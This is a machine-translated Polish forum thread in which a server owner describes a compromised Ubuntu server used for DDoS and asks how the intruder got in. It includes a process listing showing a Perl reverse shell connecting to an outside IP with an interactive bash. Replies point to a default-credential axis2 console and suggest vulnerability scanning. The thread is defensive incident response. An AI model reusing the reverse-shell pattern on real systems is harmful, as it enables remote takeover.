Jak znaleźć luki w zabezpieczeniach usług ubuntu? [Zamknięte]


1

Mam uruchomiony serwer Ubuntu. Dzisiaj dowiedziałem się, że serwer został zhakowany i jest używany do DDoS poprzez raport o nadużyciach Amazon.

Na serwerze znalazłem następujące rzeczy.

Następujące podejrzane pliki znajdują się na serwerze.

-rw-r--r-- 1 www-data www-data      759 Dec 21 15:38 weiwei.pl
-rwxrwxrwx 1 www-data www-data  1223123 Dec 26 02:20 huizhen
-rwxr-xr-x 1 www-data www-data        5 Jan 26 14:21 gates.lod
-rwxrwxrwx 1 www-data www-data  1135000 Jan 27 14:09 sishen
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.5
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.4
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.3
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.2
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.1
-rwxr-xr-x 1 www-data www-data        5 Jan 28 14:00 vga.conf
-rw-r--r-- 1 www-data www-data      119 Jan 29 06:22 cmd.n
-rw-r--r-- 1 www-data www-data       73 Feb  1 01:01 conf.n

Uruchomiono następujący proces

www-data  8292 10629  0 Jan28 ?        00:00:00 perl /tmp/weiwei.pl 222.186.42.207 5222
www-data  8293  8292  0 Jan28 ?        00:00:00 /bin/bash -i
www-data  8293  8292  0 Jan28 ?        00:00:00 ./huizhen

Pobiegłem clamavi usunięte /tmp/huizheni /tmp/sishenpliki, ale procesy były nadal działa weiwei.pli ./huizhentak Zabiłem je ręcznie.

Na serwerze działają następujące usługi.

  • SSH - Nie używa domyślnego portu 22, tylko uwierzytelnianie klucza
  • MongoDB - Port jest otwarty dla określonej grupy zabezpieczeń
  • Pamięć podręczna - port jest otwarty dla określonej grupy zabezpieczeń
  • NodeJS - Port jest otwarty dla określonej grupy zabezpieczeń
  • Tomcat - porty 8080/8443 są publiczne dla usługi sieciowej axis2 i solr

Zakładam, że haker dostał się przez lukę w zabezpieczeniach tomcat / axis2 / solr, ponieważ proces działa przy użyciu tej samej grupy użytkowników co tomcat.

Na razie zablokowałem porty 8080/8443 i zastąpię serwer nowym. Tomcat będzie dostępny z innego serwera za pośrednictwem nginx. Zainstalowałem również poprawki bezpieczeństwa za pomocą aktualizacji nienadzorowanych .

Problem polega na tym, jak dowiedzieć się, w jaki sposób haker dostał się i umieścił trojany. Jakie inne kroki mogę podjąć, aby zwiększyć bezpieczeństwo.


2
Luka jest prawie na pewno w warstwie aplikacji, więc potwierdź konfigurację swojego serwera i konfigurację aplikacji w nim uruchomionych. Potwierdź, że twój serwer WWW i komponenty aplikacji (takie jak środowisko uruchomieniowe Perla) są aktualne.
Frank Thomas

Gdy serwer zostanie przejęty, całkowite usunięcie infekcji jest prawdopodobnie większym problemem niż jest to warte. Rozważ ponowną instalację.
Ben N

@FrankThomas, Dzięki, masz rację. Tak naprawdę było na poziomie aplikacji. Konsola administracyjna osi2 była publicznie dostępna z domyślnym un / pw. Znaleźli go i przesłali serwis internetowy, który daje dostęp do funkcji niskiego poziomu, takich jak wykonywanie poleceń, uzyskiwanie dostępu do powłoki, tworzenie plików itp.
bitkot

@BenN, to jest pierwsza rzecz, którą zamierzam zrobić, ale chodzi o to, że nie jest to pierwszy raz, więc musiałem znaleźć drzwi od miejsca, w którym się dostali.
bitkot

Odpowiedzi:


1

To dość rozsądne pytanie. Ściśle mówiąc, najlepszym rozwiązaniem, aby odpowiedzieć na to pytanie, byłoby zamrożenie systemu i przeprowadzenie testów kryminalistycznych. Wszelkie późniejsze interwencje z twojej strony, w tym usuwanie wirusów, zmienią i prawdopodobnie całkowicie usuną okruchy chleba pozostawione przez intruza.

Biorąc pod uwagę, że ta droga nie jest już otwarte dla ciebie jest, najlepiej jest użyć narzędzia Vulnerability Scanner, program IE zaprojektowane dokładnie w celu testów warunków skrajnych instalacji. Jest bardzo możliwe, możesz po prostu użyć tego terminu Vulnerability Scanner, ale najbardziej znanym jest Nessus . Występuje w kilku wersjach, od bezpłatnej do płatnej z różnymi licencjami, i może stać się dość drogi, być może nawet więcej niż jesteś gotów rozwidlić.

Istnieje jednak również darmowa wersja, która jest wstępnie zainstalowana w systemie Kali Linux . Będziesz musiał go zarejestrować, nawet jeśli jest całkowicie darmowy. Wielu z nas korzysta z Kali, instalując go na maszynie wirtualnej na laptopie, a następnie wykonując testy warunków skrajnych spoza naszych domów, aby sprawdzić, które wady (= niełatwe, znane luki, najczęściej) pozostają w aplikacjach działających na Serwer z dostępem do Internetu.

Istnieją przewodniki, które uczą, jak korzystać z tego w całym Internecie, i możesz wypróbować go również we własnej sieci LAN (jeśli ufasz zaporze), a nawet z tego samego komputera, jeśli będziesz uruchamiał Kali jako maszynę wirtualną.

Korzystając z naszej strony potwierdzasz, że przeczytałeś(-aś) i rozumiesz nasze zasady używania plików cookie i zasady ochrony prywatności.
Licensed under cc by-sa 3.0 with attribution required.